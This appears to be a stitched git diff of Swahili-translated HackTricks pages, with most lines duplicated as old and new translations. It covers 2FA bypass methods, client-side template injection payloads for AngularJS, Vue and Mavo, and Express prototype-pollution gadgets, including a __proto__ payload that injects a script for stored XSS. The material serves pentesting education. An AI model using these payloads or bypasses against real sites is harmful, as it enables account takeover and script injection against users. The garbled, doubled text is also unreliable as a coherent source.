Ukosefu wa kikomo kwenye idadi ya majaribio ya nambari inaweza kuruhusu mashambulio ya brute force, ingawa inapaswa kuzingatiwa kikomo cha kimya cha kasi.
#### **Mashambulizi ya Brute Force ya Polepole**
#### **Mashambulio ya Brute Force ya Polepole**
Mashambulizi ya brute force ya polepole yanawezekana ambapo kuna mipaka ya kasi ya mchakato bila kikomo kuu.
Mashambulio ya brute force ya polepole yanawezekana ambapo kuna vikwazo vya kasi ya mtiririko bila kikomo kuu.
#### **Kurejesha Upya Kikomo cha Nambari**
#### **Kurejesha Upya Kikomo cha Kutuma Nambari**
Kutuma tena nambari kunairejesha kikomo cha kasi, kurahisisha majaribio ya brute force kuendelea.
Kutuma tena nambari kunairejesha kikomo cha kasi, kurahisisha majaribio ya brute force yanayoendelea.
#### **Kuzunguka Kikomo cha Kasi ya Mteja**
Hati inaelezea mbinu za kupuuza kikomo cha kasi cha mteja.
Hati inaelezea mbinu za kuzunguka kikomo cha kasi ya mteja.
#### **Hatua za Ndani Haziweki Kikomo cha Kasi**
#### **Hatua za Ndani Zinakosa Kikomo cha Kasi**
Mipaka ya kasi inaweza kulinda majaribio ya kuingia lakini sio hatua za akaunti za ndani.
Vikwazo vya kasi vinaweza kulinda majaribio ya kuingia lakini sio hatua za ndani za akaunti.
#### **Gharama za Kutuma Upya Nambari za SMS**
Kutuma upya nambari kupitia SMS kunagharimu kampuni, ingawa haisababishi kupuuza 2FA.
Kutuma upya nambari kupitia SMS kunagharimu kampuni, ingawa haisababishi kupita 2FA.
#### **Uzalishaji Usio na Mwisho wa OTP**
#### **Uzalishaji wa OTP Usio na Mwisho**
Uzalishaji usio na mwisho wa OTP na nambari rahisi kuruhusu brute force kwa kujaribu seti ndogo ya nambari.
### **Udanganyifu wa Hali ya Mashindano**
Kuchexploitisha hali za mashindano kwa kupuuza 2FA inaweza kupatikana katika hati maalum.
Kudukua hali za mashindano kwa kupita 2FA inaweza kupatikana kwenye hati maalum.
### **Makosa ya CSRF/Clickjacking**
Kuchunguza makosa ya CSRF au Clickjacking kwa kulegeza 2FA ni mkakati unaoweza kutumika.
Kuchunguza makosa ya CSRF au Clickjacking kwa kulemaza 2FA ni mkakati unaoweza kutumika.
### **Mbinu za Kutumia "Nikumbuke"**
### **Udanganyifu wa Kipengele cha "Kumbuka Mimi"**
#### **Alama za Vidakuzi Zinazoweza Kupredict**
#### **Thamani za Vidakuzi Zinazoweza Kupredict**
Kudhani thamani ya kuki ya "nikumbuke" kunaweza kupuuza vizuizi.
Kudhani thamani ya kuki ya "kumbuka mimi" kunaweza kupita vizuizi.
#### **Uigaji wa Anwani ya IP**
Kujifanya kuwa anwani ya IP ya muhanga kupitia kichwa cha **X-Forwarded-For** kunaweza kupuuza vizuizi.
Kujifanya kuwa anwani ya IP ya mwathiriwa kupitia kichwa cha **X-Forwarded-For** kunaweza kupita vizuizi.
### **Matumizi ya Toleo za Zamani**
#### **Subdomains**
Kujaribu subdomains kunaweza kutumia toleo za zamani zisizo na msaada wa 2FA au zina utekelezaji wa 2FA wenye mapungufu.
Kujaribu subdomains kunaweza kutumia toleo za zamani zisizo na msaada wa 2FA au kuwa na utekelezaji wa 2FA unaoweza kudukuliwa.
#### **Njia za API**
Toleo za zamani za API, zinazoonyeshwa na njia za saraka za /v\*/, zinaweza kuwa na mapungufu ya kupuuza 2FA.
Toleo za zamani za API, zinazoonyeshwa na njia za saraka za /v\*/, zinaweza kuwa na mapungufu ya kupita 2FA.
### **Kushughulikia Vikao Vya Awali**
Kukomesha vikao vilivyopo baada ya kuanzisha 2FA hulinda akaunti dhidi ya ufikiaji usioidhinishwa kutoka kwa vikao vilivyoharibiwa.
Kukomesha vikao vilivyopo baada ya kuamsha 2FA kunalinda akaunti dhidi ya upatikanaji usioidhinishwa kutoka kwa vikao vilivyoathiriwa.
### **Makosa ya Udhibiti wa Upatikanaji na Nambari za Kuhifadhi**
### **Makosa ya Kudhibiti Upatikanaji na Nambari za Kurejesha**
Uzalishaji wa haraka na upatikanaji usiohalali wa nambari za kuhifadhi mara baada ya kuanzisha 2FA, hasa na makosa ya CORS/XSS, inaleta hatari.
Uzalishaji wa haraka na upatikanaji usioidhinishwa wa nambari za kurejesha mara moja baada ya kuamsha 2FA, hasa na misongamano ya CORS/XSS, inaleta hatari.
### **Ufunuo wa Taarifa kwenye Ukurasa wa 2FA**
### **Ufunuo wa Habari kwenye Ukurasa wa 2FA**
Ufunuo wa taarifa nyeti (k.m., nambari ya simu) kwenye ukurasa wa uthibitishaji wa 2FA ni wasiwasi.
Ufunuo wa habari nyeti (k.m., nambari ya simu) kwenye ukurasa wa uthibitishaji wa 2FA ni wasiwasi.
### **Kulegeza Urejesha Nywila Kupitia Kupuuza 2FA**
### **Kulemaza Ufutaji wa Nywila Unapozimisha 2FA**
Mchakato unaodhihirisha njia ya kupuuza inajumuisha uundaji wa akaunti, kuanzisha 2FA, urejeshaji wa nywila, na kuingia baadaye bila mahitaji ya 2FA.
Mchakato unaodhihirisha njia ya kupita unajumuisha uundaji wa akaunti, kuamsha 2FA, kufutaji wa nywila, na kuingia baadaye bila mahitaji ya 2FA.
### **Maombi ya Kudanganya**
Kutumia maombi ya kudanganya kuficha majaribio ya brute force au kudanganya mifumo ya kikomo cha kasi huongeza safu nyingine kwa mikakati ya kupuuza. Kuunda maombi kama hayo kunahitaji uelewa wa kina wa hatua za usalama za programu na tabia za kikomo cha kasi.
Kutumia maombi ya kudanganya kuficha majaribio ya brute force au kudanganya mifumo ya kikomo cha kasi kunatoa safu nyingine kwa mikakati ya kupita. Kuunda maombi kama hayo kunahitaji uelewa wa kina wa hatua za usalama za programu na tabia za kikomo cha kasi.
## Marejeo
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -4,26 +4,39 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
# Muhtasari
Ni kama [**Uvujaji wa Kiolesura cha Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kuruhusu wewe **kutekeleza nambari** kwenye seva ya mbali, **CSTI** inaweza kuruhusu wewe **kutekeleza nambari ya JavaScript** isiyo na kikomo kwenye kivinjari cha muathiriwa.
Ni kama [**Uvujaji wa Kigezo cha Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kukuruhusu kutekeleza msimbo kwenye seva ya mbali, **CSTI** inaweza kukuruhusu kutekeleza msimbo wa JavaScript wa aina yoyote kwenye kivinjari cha mwathiriwa.
**Kujaribu** kwa udhaifu huu ni sawa na katika kesi ya **SSTI**, mkalimani anatarajia **kiolesura** na kuitekeleza. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na kama sivyo, utaona asili: `{{ 7-7 }}`
**Kutafuta** udhaifu huu ni sawa sana kama katika kesi ya **SSTI**, mkalimani anatarajia **kigezo** na kukiendesha. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na ikiwa sio, utaona asili: `{{ 7-7 }}`
# AngularJS
AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa inayoitwa miongozo, moja inayojulikana ni **`ng-app`**. Miongozo hii inaruhusu AngularJS kusindika yaliyomo ya HTML, ikiruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
AngularJS ni mfumo maarufu wa JavaScript ambao hufanya kazi na HTML kupitia sifa inayoitwa maelekezo, moja muhimu ikiwa ni **`ng-app`**. Mwongozo huu huruhusu AngularJS kusindika yaliyomo ya HTML, kuruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulioandikwa na `ng-app`, inawezekana kutekeleza nambari isiyo na kikomo ya JavaScript. Hii inaweza kufanikishwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi nambari ya JavaScript inavyoweza kutekelezwa:
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulio na lebo ya `ng-app`, inawezekana kutekeleza msimbo wa JavaScript wa aina yoyote. Hii inaweza kufanikiwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -41,16 +54,16 @@ Unaweza kupata mfano wa msingi sana wa udhaifu katika **AngularJS** katika [http
# VueJS
Unaweza kupata utekelezaji wa **Vue ulio na udhaifu** katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Mzigo unaofanya kazi: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Mzigo unaoendelea: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Na **msimbo wa chanzo** wa mfano ulio na udhaifu unapatikana hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
Na **msimbo wa chanzo** wa mfano ulio na udhaifu hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
## **V3**
Unaweza kupata chapisho nzuri sana kuhusu CSTI katika VUE kwenye [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
@ -66,7 +79,7 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
# Mavo
Payload:
Mzigo:
```
[7*7]
[(1,alert)(1)]
@ -80,23 +93,34 @@ javascript:alert(1)%252f%252f..%252fcss-images
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**Payloads zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
**Paylodi zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
# **Orodha ya Uchunguzi wa Kuvunja-Nguvu**
# **Orodha ya Uchunguzi wa Nguvu**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,26 +1,40 @@
# Vifaa vya Uharibifu wa Mfano wa Express
# Vifaa vya Uharibifu wa Prototipi za Express
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Hudumisha Majibu ya XSS
## WhiteIntel
**Kwa maelezo zaidi [angalia utafiti asilia](https://portswigger.net/research/server-side-prototype-pollution)**
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Toa Majibu ya XSS
**Kwa maelezo zaidi [angalia utafiti wa asili](https://portswigger.net/research/server-side-prototype-pollution)**
### Badilisha aina ya yaliyomo ya JSON kuwa HTML
Katika programu ya Express inayotumia **aina ya yaliyomo ya JSON** na kurejelea JSON:
Katika programu ya Express ikitumia **aina ya majibu ya yaliyomo ya JSON** na kufunua JSON:
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -28,41 +42,41 @@ _.merge({}, req.body);
res.send(req.body);
});
```
Katika kesi hizi, XSS kawaida haiwezekani na aina ya yaliyomo ya JSON. Walakini, kwa kutumia uchafuzi wa prototype tunaweza **kuchanganya Express kutumikia jibu la HTML.** Udhaifu huu unategemea matumizi ya programu ya **`res.send(obj)`** na kutumia kipambatishaji wa mwili na aina ya yaliyomo ya application/json.
Katika kesi hizi XSS kawaida haiwezekani na aina ya yaliyomo ya JSON. Walakini, kwa kuchafua prototype tunaweza **kuchanganya Express kutumikia jibu la HTML.** Udhaifu huu unategemea maombi kutumia **`res.send(obj)`** na kutumia parser ya mwili na aina ya yaliyomo ya application/json.
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
Kwa **kuchafua** mali za **`body`** na **`_body`**, inawezekana kusababisha **Express kutumikia aina ya yaliyomo ya HTML** na kurejeleza mali ya `_body`, ikisababisha XSS iliyohifadhiwa.
Kwa **kuichafua** mali za **`body`** na **`_body`**, inawezekana kusababisha **Express kutumikia aina ya yaliyomo ya HTML** na kufunua mali ya `_body`, ikisababisha XSS iliyohifadhiwa.
### Rejeleza UTF7
### Toa UTF7
Inawezekana kufanya express **kurejeleza yaliyomo ya UTF-7 kwa**:
Inawezekana kufanya express **itoa yaliyomo ya UTF-7 na**:
```json
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
```
## Mbinu Salama za Uchanganuzi
## Mbinu Salama za Kuchunguza
### Nafasi za JSON
PP ifuatayo itafanya sifa ndani ya JSON kuwa na nafasi ya ziada ambayo haitavunja utendaji:
PP ifuatayo itafanya sifa ndani ya JSON kuwa na nafasi ya ziada ambayo haitaharibu utendaji:
```json
{"__proto__":{"json spaces": " "}}
```
Kisha JSON iliyorejeshwa itaonekana kama:
Kisha JSON iliyorudishwa itaonekana kama:
```json
{"foo": "bar"} -- Note the extra space
```
### Vichwa Vilivyofunuliwa
### Vichwa vilivyofunuliwa
Gadgeti ya PP ifuatayo itafanya seva itume tena kichwa cha HTTP: **`Access-Control-Expose_headers: foo`**
Kifaa cha PP kinachofuata kitafanya server itume tena kichwa cha HTTP: **`Access-Control-Expose_headers: foo`**
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
Inahitaji **moduli ya CORS iwe imewekwa**
### **Njia ya OPTIONS**
### **Mbinu ya OPTIONS**
Kwa mzigo ufuatao, ni **inawezekana kuficha njia kutoka kwenye jibu la OPTIONS**:
Kwa mzigo wa kufuata, ni **inawezekana kuficha mbinu kutoka kwa jibu la OPTIONS**:
```javascript
// Original reponse: POST,GET,HEAD
@ -79,47 +93,60 @@ Inawezekana kubadilisha **kodi ya hali iliyorudishwa** kwa kutumia mzigo wa PP u
```
### Kosa
Wakati unapoweka kwa kigezo na kigezo cha msingi kama vile herufi, inazalisha **operesheni ya no-op tangu kigezo lazima kiwe kitu**. Ikiwa unajaribu kuweka kigezo cha kigezo kwa `Object.prototype` yenyewe, hii italeta **kutupwa kwa kosa**. Tunaweza kutumia tabia hizi mbili kugundua ikiwa uchafuzi wa kigezo umefanikiwa:
Wakati unapoweka kwa kigezo na kitu cha msingi kama herufi, inazalisha **operesheni ya no-op kwa sababu kigezo lazima kiwe kitu**. Ikiwa unajaribu kuweka kigezo cha kitu kwa `Object.prototype` yenyewe, hii itasababisha **kutupwa kwa kosa**. Tunaweza kutumia tabia hizi mbili kugundua ikiwa **uchafuzi wa kigezo ulifanikiwa**:
```javascript
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
```
### Thamani Iliyorejeshwa
Wakati programu inajumuisha kitu katika jibu lake, kuunda sifa na **jina lisilo la kawaida pamoja na `__proto__`** kunaweza kuwa na ufahamu. Hasa, ikiwa **sifa lisilo la kawaida pekee ndiyo inayorejeshwa** katika jibu, hii inaweza kuashiria udhaifu wa programu:
Wakati programu inajumuisha kitu katika majibu yake, kuunda sifa na **jina lisilo la kawaida pamoja na `__proto__`** inaweza kuwa na manufaa. Hasa, ikiwa **sifa lisilo la kawaida pekee ndio inayorejeshwa** katika majibu, hii inaweza kuashiria udhaifu wa programu:
```json
{"unusualName":"value","__proto__":"test"}
```
Zaidi ya hayo, katika hali ambapo maktaba kama Lodash inatumika, kuweka mali kwa njia ya uchafuzi wa kigezo (PP) na moja kwa moja ndani ya kifaa kinatoa njia nyingine ya uchunguzi. Ikiwa mali kama hiyo haipo katika jibu, inaonyesha kuwa Lodash inathibitisha uwepo wa mali katika kifaa cha lengo kabla ya kufanya muunganisho.
Zaidi ya hayo, katika hali ambapo maktaba kama Lodash inatumika, kuweka mali kwa njia ya uchafuzi wa prototype (PP) na moja kwa moja ndani ya kitu hutoa njia nyingine ya uchunguzi. Ikiwa mali kama hiyo haipo kwenye jibu, inaashiria kuwa Lodash inathibitisha uwepo wa mali katika kitu cha lengo kabla ya kufanya ushirikiano:
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
```
## Vinginevyo
## Mambo Mbalimbali
### Ruhusu Alama za Kipindi
### Ruhusu Dots
Kuna chaguo katika Express ambacho kinakuwezesha **kuunda vitu kutoka kwa vigezo vya herufi za utafutaji**.\
Unaweza kuitumia kwa hakika katika mlolongo wa kasoro ili kudukua udhaifu wa **uchafuzi wa mfano**.
Kuna chaguo katika Express ambalo linakuruhusu **kuunda vitu kutoka kwa paramita za mfuatilio wa string**.\
Unaweza kuitumia kwa hakika katika mlolongo wa makosa kufaidika na **udhaifu wa uchafuzi wa prototype**.
```json
{"__proto__":{"allowDots":true}}
```
**`?foo.bar=baz` inazalisha kitu katika Node.**
**`?foo.bar=baz` inajenga kitu katika Node.**
## Marejeo
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,27 +1,40 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
